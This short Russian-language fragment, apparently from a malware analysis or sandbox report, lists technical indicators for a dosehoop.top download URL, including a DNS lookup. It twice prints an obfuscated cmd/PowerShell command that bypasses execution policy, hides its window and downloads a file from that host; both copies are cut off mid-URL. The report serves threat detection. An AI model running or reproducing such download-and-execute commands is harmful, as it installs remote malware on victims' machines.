Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWE^RS^He^L^L.exe -^E^XEC^ut^IOnp^OlICY ^b^yP^aSs -nOPR^oF^IL^e^ -wINDo^w^s^t^YLE^ hIDDeN ^(N^Ew-^Ob^jEcT^ ^s^YS^tE^M^.nET.WEb^cl^IeNT).^dOWnl^O^a^dfILe('http://dosehoop.top...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "poWE^RS^He^L^L.exe -^E^XEC^ut^IOnp^OlICY ^b^yP^aSs -nOPR^oF^IL^e^ -wINDo^w^s^t^YLE^ hIDDeN ^(N^Ew-^Ob^jEcT^ ^s^YS^tE^M^.nET.WEb^cl^IeNT).^dOWnl^O^a^dfILe('http://dosehoop.top...' (со скрытым окном)